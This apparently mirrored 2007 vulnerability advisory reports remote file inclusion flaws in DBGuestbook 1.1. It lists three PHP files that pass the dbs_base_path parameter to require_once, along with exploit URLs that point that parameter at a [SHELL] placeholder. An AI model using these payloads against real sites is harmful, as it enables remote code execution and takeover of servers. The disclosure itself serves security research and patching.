Lucene search
SecurityvulnsSECURITYVULNS:DOC:16153HistoryFeb 23, 2007 - 12:00 a.m.
DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities
2007-02-2300:00:00
vulners.com
12
DBGuestBook 1.1
Found by Denven *
Script: http://www.dbscripts.net/download/?file=2
ERROR:
includes/utils.php require_once $dbs_base_path
includes/guestbook.php require_once $dbs_base_path
includes/views.php require_once $dbs_base_path
RFI:
http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]
denven[at]gmail[dot]com